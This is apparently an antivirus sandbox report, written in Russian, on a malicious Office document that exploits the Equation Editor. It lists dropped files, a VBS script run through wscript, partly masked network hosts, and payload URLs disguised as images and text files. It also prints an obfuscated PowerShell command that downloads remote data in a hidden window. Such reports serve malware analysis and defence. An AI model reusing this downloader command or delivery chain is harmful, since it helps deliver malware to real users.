Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\profilegoodforinvestreturner.vBS"
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
- %APPDATA%\profilegoodforinvestreturner.vbs
- <Текущая директория>\815f0000
Подменяет следующие файлы
- <PATH_SAMPLE>.xls
Сетевая активность
Подключается к
- 'il##g.in':80
- '23.##.235.16':80
- '91.##.254.29':80
- '91.##.254.194':80
TCP
Запросы HTTP GET
- http://il##g.in/TzUwT
- http://23.##.235.16/55099/er/er.er.er.erererere.doC
- http://23.##.235.16/55099/profilegoodforinvestreturns.gif
- http://91.##.254.29/Users_API/syscore/file_gsakef5y.zfx.txt
- http://91.##.254.194/imge/new-image_v.jpg
UDP
- DNS ASK il##g.in
Другое
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "(('H9Clink = KZphttp://'+'91.##.254.194/imge/new-image_v.jpgKZp; H9Cw'+'ebClient = New-Object System.N'+'et.WebClient; try { H9CdownloadedDat'+'a = H9CwebClient.DownloadData(H9Clink) ... (со скрытым окном)
